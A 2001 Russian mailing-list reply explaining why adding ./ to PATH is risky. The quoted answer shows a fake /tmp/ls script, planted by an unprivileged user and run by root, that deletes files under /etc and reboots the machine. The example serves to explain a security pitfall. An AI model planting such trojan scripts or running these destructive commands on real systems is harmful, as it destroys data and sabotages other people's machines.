[mdk-re] ./ in PATH
Vladimir Karpinsky
=?iso-8859-1?q?vkarpinsky_=CE=C1_beep=2Eru?=
Ср Сен 26 18:43:17 MSD 2001
Здравствуйте,
Wednesday, September 26, 2001, 6:23:04 PM, Вы писали:
PVS> Vladimir Karpinsky wrote:
>> Hello Mandrake-russian,
>>
>> Объясните пожалуйста мне такую штуку:
>> когда-то для облегчения запуска программ из ./, я в своем(ей) .bashrc
>> включил ./ в PATH. Все вроде было ничего, пока кто-то из знакомых,
>> увидев это, не закричал со страшной силой: "Это делать нельзя ни в
>> коем случае!" Но вот аргументировано объяснить почему это делать
>> нельзя, он не смог. Я тогда-то убрал ЭТО на всякий случай, но
>> неудовлетворенное любопытство гложет уже который год. Вопрос
>> соответственно: можно ли ЭТО так делать или нет, если нет, то почему?
PVS> Предположим, вы - админ. А я -тот при*к, который обнаружил этот баг. А
PVS> теперь мои и Ваши действия:
PVS> peet на yourhost$ echo -e "#!/bin/sh \n /bin/rm -rf '/etc/*' \n
PVS> /sbin/shutdown -r now \n echo -e '\007 отгреби' \n" > /tmp/ls
PVS> root на yourhost# cd /tmp
PVS> root на yourhost# ls
Неприятная картинка вырисовывается. Спасибо.
--
Всех благ,
Владимир
mailto:vkarpinsky на beep.ru
Подробная информация о списке рассылки community